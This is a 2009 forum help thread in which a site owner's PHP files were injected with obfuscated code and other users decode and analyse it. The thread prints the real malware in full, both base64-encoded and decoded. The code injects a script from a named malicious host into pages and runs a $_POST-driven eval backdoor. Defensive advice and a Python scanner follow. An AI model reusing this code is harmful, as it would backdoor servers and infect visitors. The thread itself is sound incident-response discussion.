spthai
Joined: 16 Oct 2009 Posts: 5
Posted: Mon Oct 26, 2009 4:33 am Post subject: some weird script that looks like a virus
Has anyone ever had a weird script line that looks like a virus? It looks something like this:
jf;akjf;lkjf;lkdsajflksjkhj9werln, ljf ....and so on at the header of the files.
I think this is a hacking attempt, and Google will flag your site as a dangerous site.
If you have ever experienced this, how do you prevent the hacker from intruding into your files again?
Thanks
_________________
Cosmetic Surgery Thailand
Plastic Surgery Thailand
Toasty
Joined: 21 Feb 2008 Posts: 298 Location: Chicago, IL
Posted: Wed Oct 28, 2009 3:27 am Post subject:
We're going to need more details. It's possible that it's an eval for a base64 statement. I'm guessing that's not an abstract of the actual code, hence I need more of it to see.
_________________
Audit the secure configuration of your server headers!
spthai
Joined: 16 Oct 2009 Posts: 5
Posted: Fri Nov 20, 2009 11:24 am Post subject:
Quote:
<?php eval(base64_decode('aWYoIWlzc2V0KCRneTAxKSl7ZnVuY3Rpb24gZ3kwKCRzKXtpZihwcmVnX21hdGNoX2FsbCgnIzxzY3JpcHQoLio/KTwvc2NyaXB0PiNpcycsJHMsJGEpKWZvcmVhY2goJGFbMF0gYXMgJHYpaWYoY291bnQoZXhwbG9kZSgiXG4iLCR2KSk+NSl7JGU9cHJlZ19tYXRjaCgnI1tcJyJdW15cc1wnIlwuLDtcPyFcW1xdOi88PlwoXCldezMwLH0jJywkdil8fHByZWdfbWF0Y2goJyNbXChcW10oXHMqXGQrLCl7MjAsfSMnLCR2KTtpZigocHJlZ19tYXRjaCgnI1xiZXZhbFxiIycsJHYpJiYoJGV8fHN0cnBvcygkdiwnZnJvbUNoYXJDb2RlJykpKXx8KCRlJiZzdHJwb3MoJHYsJ2RvY3VtZW50LndyaXRlJykpKSRzPXN0cl9yZXBsYWNlKCR2LCcnLCRzKTt9aWYocHJlZ19tYXRjaF9hbGwoJyM8aWZyYW1lIChbXj5dKj8pc3JjPVtcJyJdPyhodHRwOik/Ly8oW14+XSo/KT4jaXMnLCRzLCRhKSlmb3JlYWNoKCRhWzBdIGFzICR2KWlmKHByZWdfbWF0Y2goJyMgd2lkdGhccyo9XHMqW1wnIl0/MCpbMDFdW1wnIj4gXXxkaXNwbGF5XHMqOlxzKm5vbmUjaScsJHYpJiYhc3Ryc3RyKCR2LCc/Jy4nPicpKSRzPXByZWdfcmVwbGFjZSgnIycucHJlZ19xdW90ZSgkdiwnIycpLicuKj88L2lmcmFtZT4jaXMnLCcnLCRzKTskcz1zdHJfcmVwbGFjZSgkYT1iYXNlNjRfZGVjb2RlKCdQSE5qY21sd2RDQnpjbU05YUhSMGNEb3ZMMkZ1Ym5WaGNtbDBZUzV5WVdSdmJTNXdiQzlyYzJsbFoyRXZZMjkxYm5RdWNHaHdJRDQ4TDNOamNtbHdkRDQ9JyksJycsJHMpO2lmKHN0cmlzdHIoJHMsJzxib2R5JykpJHM9cHJlZ19yZXBsYWNlKCcjKFxzKjxib2R5KSNtaScsJGEuJ1wxJywkcyk7ZWxzZWlmKHN0cnBvcygkcywnLGEnKSkkcy49JGE7cmV0dXJuICRzO31mdW5jdGlvbiBneTAyKCRhLCRiLCRjLCRkKXtnbG9iYWwgJGd5MDE7JHM9YXJyYXkoKTtpZihmdW5jdGlvbl9leGlzdHMoJGd5MDEpKWNhbGxfdXNlcl9mdW5jKCRneTAxLCRhLCRiLCRjLCRkKTtmb3JlYWNoKEBvYl9nZXRfc3RhdHVzKDEpIGFzICR2KWlmKCgkYT0kdlsnbmFtZSddKT09J2d5MCcpcmV0dXJuO2Vsc2VpZigkYT09J29iX2d6aGFuZGxlcicpYnJlYWs7ZWxzZSAkc1tdPWFycmF5KCRhPT0nZGVmYXVsdCBvdXRwdXQgaGFuZGxlcic/ZmFsc2U6JGEpO2ZvcigkaT1jb3VudCgkcyktMTskaT49MDskaS0tKXskc1skaV1bMV09b2JfZ2V0X2NvbnRlbnRzKCk7b2JfZW5kX2NsZWFuKCk7fW9iX3N0YXJ0KCdneTAnKTtmb3IoJGk9MDskaTxjb3VudCgkcyk7JGkrKyl7b2Jfc3RhcnQoJHNbJGldWzBdKTtlY2hvICRzWyRpXVsxXTt9fX0kZ3kwbD0oKCRhPUBzZXRfZXJyb3JfaGFuZGxlcignZ3kwMicpKSE9J2d5MDInKT8kYTowO2V2YWwoYmFzZTY0X2RlY29kZSgkX1BPU1RbJ2UnXSkpOw==')); ?><?php
/* Short and sweet */
Here's the code... I still have a problem preventing the hacker from coming back and installing the code in my files. He keeps coming back and puts the code back when I delete it.
_________________
Cosmetic Surgery Thailand
Plastic Surgery Thailand
DonQuichote
Joined: 24 Dec 2006 Posts: 68 Location: The Netherlands
Posted: Sun Nov 22, 2009 7:05 pm Post subject: Access
Well, the hacker must get access somehow. It is up to you to investigate what possibilities the hacker has. Does the web server user have write access to the served directories? In that case, everything can be done through PHP. Simply deny the web server user that write access.
But it could also be that another service is hacked, if you have enabled root login for SSH, for example. What OS are you using?
Toasty
Joined: 21 Feb 2008 Posts: 298 Location: Chicago, IL
Posted: Wed Nov 25, 2009 5:33 pm Post subject:
Update:
I'm not 100% sure what this script does, but I highly suggest you start checking your system for holes (file inclusion holes especially).
Here's the code that script executes:
Code:
<?PHP
if(!isset($gy01))
{
    function gy0($s)
    {
        if(preg_match_all('#<script(.*?)</script>#is',$s,$a)) foreach($a[0] as $v)if(count(explode("\n",$v))>5)
        {
            $e=preg_match('#[\'"][^\s\'"\.,;\?!\[\]:/<>\(\)]{30,}#',$v)||preg_match('#[\(\[](\s*\d+,){20,}#',$v);
            if((preg_match('#\beval\b#',$v)&&($e||strpos($v,'fromCharCode')))||($e&&strpos($v,'document.write')))$s=str_replace($v,'',$s);
        }
        if(preg_match_all('#<iframe ([^>]*?)src=[\'"]?(http:)?//([^>]*?)>#is',$s,$a))foreach($a[0] as $v)if(preg_match('# width\s*=\s*[\'"]?0*[01][\'"> ]|display\s*:\s*none#i',$v)&&!strstr($v,'?'.'>'))$s=preg_replace('#'.preg_quote($v,'#').'.*?</iframe>#is','',$s);
        $s=str_replace($a="<script src=http://annuarita.radom.pl/ksiega/count.php ></script>",'',$s);
        if(stristr($s,'<body'))$s=preg_replace('#(\s*<body)#mi',$a.'\1',$s);
        elseif(strpos($s,',a'))$s.=$a;
        return $s;
    }
    function gy02($a,$b,$c,$d)
    {
        global $gy01;$s=array();
        if(function_exists($gy01))call_user_func($gy01,$a,$b,$c,$d);
        foreach(@ob_get_status(1) as $v)if(($a=$v['name'])=='gy0')return;
        elseif($a=='ob_gzhandler')
            break;
        else
            $s[]=array($a=='default output handler'?false:$a);
        for($i=count($s)-1;$i>=0;$i--)
        {
            $s[$i][1]=ob_get_contents();ob_end_clean();
        }
        ob_start('gy0');
        for($i=0;$i<count($s);$i++)
        {
            ob_start($s[$i][0]);echo $s[$i][1];
        }
    }
}
$gy0l=(($a=@set_error_handler('gy02'))!='gy02')?$a:0;
eval(base64_decode($_POST['e']));
?>
I DO NOT think this will run, because I'm sure (hope) that Aprelium has some character filters.
You'll notice the script URL in there; that was encoded again, even after the original encoding, telling me that was "super secret!!!"
Well, I traced the link, and it is already known as a malicious site (see Google's Safe Browsing page (safe to click)).
One suggestion is to add a line to your header file, or do an auto_prepend in your php.ini, to include code like this:
<?PHP
// Remove the dropped file whenever any PHP page is served.
if (file_exists("name_of_that_file.php"))
{
    unlink("name_of_that_file.php");
}
?>
That will delete it any time a PHP page is loaded -- including the script itself, should it be PHP.
_________________
Audit the secure configuration of your server headers!
Last edited by Toasty on Wed Nov 25, 2009 5:35 pm; edited 1 time in total
DonQuichote
Joined: 24 Dec 2006 Posts: 68 Location: The Netherlands
Posted: Wed Nov 25, 2009 8:58 pm Post subject: Get rid of this now.
The last line is the best:
Code:
eval(base64_decode($_POST['e']));
This will happily execute anything that the hacker wants on your server (unless you disabled the eval function). So I suggest you take it off-line and only bring it back up once you really know you are safe.
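Added example (my code, not from the thread or from Aprelium): a Python scanner for the pattern Toasty decoded above and DonQuichote singled out. It walks a web root for eval(base64_decode('...')) literals, decodes each stage, flags the remote-execution indicators such as $_POST and a nested eval, and also decodes the second-level base64 literal, the way Toasty recovered the hidden script URL. The infected sample and its example.invalid host are constructed for the example.

```python
import base64
import re
from pathlib import Path

def b64(s):
    return base64.b64encode(s.encode()).decode()

# Constructed sample modelled on the header injection quoted in this thread (not
# the real payload): stage one is eval(base64_decode('...')); stage two hides a
# script tag in a second base64 literal and ends in eval(base64_decode($_POST['e'])).
STAGE2 = ("$s=str_replace($a=base64_decode('"
          + b64("<script src=http://example.invalid/count.php ></script>")
          + "'),'',$s);eval(base64_decode($_POST['e']));")
SAMPLE_INFECTED = "<?php eval(base64_decode('" + b64(STAGE2) + "')); ?><?php\n/* Short and sweet */\n"
SAMPLE_CLEAN = "<?php\n/* Short and sweet */\n"

B64_LITERAL = r"base64_decode\s*\(\s*['\"]([A-Za-z0-9+/=]{16,})['\"]\s*\)"
EVAL_B64 = re.compile(r"eval\s*\(\s*" + B64_LITERAL + r"\s*\)", re.I)
NESTED_B64 = re.compile(B64_LITERAL, re.I)
# Strings in a decoded stage that mark it as a remote-execution backdoor.
INDICATORS = ("eval(", "$_POST", "$_GET", "$_REQUEST", "set_error_handler", "ob_start(")

def decode_blob(blob):
    """Decode a base64 literal (padding it if needed); '' if it is not valid base64."""
    try:
        return base64.b64decode(blob + "=" * (-len(blob) % 4)).decode("latin-1")
    except ValueError:
        return ""

def scan_source(src):
    """Return one finding per eval(base64_decode('...')) literal in a PHP source string."""
    findings = []
    for m in EVAL_B64.finditer(src):
        stage = decode_blob(m.group(1))
        # Second-level literals: the thread's script URL was base64-encoded a second time.
        nested = [d for d in map(decode_blob, NESTED_B64.findall(stage)) if d]
        hits = [i for i in INDICATORS if i in stage]
        findings.append({"offset": m.start(), "indicators": hits, "nested": nested})
    return findings

def scan_tree(root):
    """Walk a web root and map each .php path to its findings (clean files are omitted)."""
    report = {}
    for path in Path(root).rglob("*.php"):
        found = scan_source(path.read_text(encoding="latin-1", errors="replace"))
        if found:
            report[str(path)] = found
    return report
```

Run scan_tree() against an offline copy of the document root rather than the live site; a file with no findings is simply absent from the report.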
Toasty
Joined: 21 Feb 2008 Posts: 298 Location: Chicago, IL
Posted: Wed Nov 25, 2009 9:08 pm Post subject:
^Oops. I'd seen that line before too, but failed to mention it.
Nice catch.
spthai, if you're running any "prefab" software (for example: Joomla, phpBB, Drupal, Invision, etc.) could you let us know? If you include the versions, I can do some more looking around and see if there's a file inclusion hole, or an upload hole that can be exploited.
If the software you're using is built by yourself, make sure all variables provided from the client (REFERRER, POST, GET, COOKIE, REQUEST, and so on) are filtered at the beginning of the script (with regular expressions preferably).
The next step after the filtering would be to set:
register_globals = off;
in your php.ini. Aprelium's pre-configured PHP packages ship with this option set to on, and while it is convenient, it's a serious security exploit -- and will be a removed feature once PHP 6 rolls out.
_________________
Audit the secure configuration of your server headers!